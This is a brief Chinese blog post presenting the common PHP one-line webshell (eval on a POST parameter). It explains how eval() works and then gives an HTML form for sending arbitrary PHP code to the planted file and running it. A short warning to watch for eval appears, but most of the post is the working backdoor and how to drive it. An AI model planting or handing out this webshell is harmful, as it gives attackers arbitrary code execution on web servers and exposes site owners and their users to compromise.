這個是php常見的一句話木馬的源碼，通過post木馬程序來實現木馬的植入，eval()函數把字符串按照PHP代碼來計算。該字符串必須是合法的PHP代碼，且必須以分號結尾。如果沒有在代碼字符串中調用return語句，則返回NULL。如果代碼中存在解析錯誤，則eval()函數返回false。

eval可以用來執行任何其他php代碼，所以對于代碼里發現了eval函數一定要小心，可能是木馬

就這一句話害死人，這樣任何人都可以post任何文件上來，所以要做好防范

1. <?php @eval($_POST['c']);?> 

使用方法也很簡單，本地提交文件指向提交文件，里面的php代碼就會被執行

1. <html>  
2. <body>  
3. <form action="a.php" method="post">  
4. <input type="text" name="c" value="phpinfo();">  
5. <input type="submit" value="submit">  
6. </form>  
7. </body>  
8. </html> 

以上所述就是本文的全部內容了，希望大家能夠喜歡。